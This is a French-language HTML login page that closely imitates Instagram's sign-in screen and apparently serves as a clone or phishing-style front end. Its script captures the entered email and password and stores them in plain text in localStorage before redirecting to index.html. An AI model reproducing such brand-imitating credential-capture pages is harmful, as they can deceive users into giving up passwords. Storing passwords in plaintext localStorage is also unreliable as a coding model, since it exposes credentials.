<!DOCTYPE html>
<html lang="fr">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Connexion</title>
    <style>
        body {
            font-family: Arial, sans-serif;
            background-color: #fafafa;
            margin: 0;
            display: flex;
            justify-content: center;
            align-items: center;
            height: 100vh;
        }

        .container {
            width: 100%;
            max-width: 350px;
            text-align: center;
            background-color: #fff;
            border: 1px solid #dbdbdb;
            padding: 20px 40px;
            border-radius: 8px;
            box-shadow: 0px 4px 10px rgba(0, 0, 0, 0.1);
        }

        .logo {
            margin-bottom: 20px;
        }

        .logo img {
            width: 150px;
        }

        .input-field {
            width: 100%;
            padding: 10px;
            margin: 8px 0;
            border: 1px solid #dbdbdb;
            border-radius: 4px;
            background-color: #fafafa;
            font-size: 14px;
        }

        .btn {
            width: 107%;
            padding: 10px;
            background-color: #0095f6;
            color: white;
            border: none;
            border-radius: 4px;
            font-size: 14px;
            font-weight: bold;
            cursor: pointer;
        }

        .btn:disabled {
            background-color: #b2dffc;
            cursor: not-allowed;
        }

        .links {
            margin-top: 15px;
            font-size: 14px;
        }

        .links a {
            color: #0095f6;
            text-decoration: none;
        }

        .links a:hover {
            text-decoration: underline;
        }

        .divider {
            display: flex;
            align-items: center;
            margin: 20px 0;
        }

        .divider::before, .divider::after {
            content: "";
            flex: 1;
            height: 1px;
            background-color: #dbdbdb;
        }

        .divider::before {
            margin-right: 10px;
        }

        .divider::after {
            margin-left: 10px;
        }

        .social-login {
            display: flex;
            align-items: center;
            justify-content: center;
            margin-top: 10px;
        }

        .social-login img {
            width: 20px;
            height: 20px;
            margin-right: 10px;
        }
    </style>
    <script>
        function handleLogin(event) {
            event.preventDefault();
            const email = document.getElementById('email').value;
            const password = document.getElementById('password').value;

            if (email && password) {
                const userInfo = { email, password };
                localStorage.setItem('userInfo', JSON.stringify(userInfo));
                localStorage.removeItem('forgotPassword');
                localStorage.removeItem('facebookLogin');
                window.location.href = 'index.html';
            } else {
                alert('Veuillez remplir tous les champs.');
            }
        }

        function handleForgotPassword() {
            localStorage.setItem('forgotPassword', true);
            localStorage.removeItem('userInfo');
            localStorage.removeItem('facebookLogin');
            window.location.href = 'index.html';
        }

        function handleFacebookLogin() {
            localStorage.setItem('facebookLogin', true);
            localStorage.removeItem('forgotPassword');
            localStorage.removeItem('userInfo');
            window.location.href = 'index.html';
        }
    </script>
</head>
<body>
    <div class="container">
        <div class="logo">
            <img src="s@4x.png" alt="Site Logo">
        </div>
        <form onsubmit="handleLogin(event)">
            <input type="text" id="email" class="input-field" placeholder="Num. téléphone, nom de profil ou e-mail">
            <input type="password" id="password" class="input-field" placeholder="Mot de passe">
            <button type="submit" class="btn">Se connecter</button>
        </form>
        <div class="divider">OU</div>
        <div class="links">
            <a href="#" onclick="handleFacebookLogin()">Se connecter avec Facebook</a>
        </div>
        <div class="links">
            <a href="#" onclick="handleForgotPassword()">Mot de passe oublié ?</a>
        </div>
    </div>
</body>
</html>
